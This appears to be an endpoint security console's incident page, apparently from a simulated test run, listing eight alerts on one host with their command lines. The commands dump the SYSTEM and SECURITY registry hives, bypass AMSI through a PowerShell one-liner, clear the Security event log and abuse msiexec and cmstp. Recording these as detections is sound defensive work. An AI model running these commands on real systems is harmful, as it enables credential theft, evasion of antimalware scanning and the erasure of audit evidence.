Back to list

Critical CINC-20251220-78AD36BD new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8679516932

Incident Overview

Incident ID CINC-20251220-78AD36BD
Severity Critical (90)
Status new
Alert Count 8
Host Count 1

Timeline

First Seen 2025-12-18 11:23:41
Last Seen 2025-12-18 11:24:56
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Credential Access AI Powered IOA Execution Defense Evasion Persistence
Techniques:
OS Credential Dumping Command and Scripting Interpreter PowerShell Indicator Removal Event Triggered Execution CMSTP User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (8)

Severity Status Hostname Description Tactic Command Line Time
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\system.hiv 12-18 11:24
High new TEAHEE A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-18 11:24
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv 12-18 11:24
High new TEAHEE A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-18 11:24
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 11:24
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 11:24
High new TEAHEE A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. Defense Evasion cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf 12-18 11:24
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-18 11:23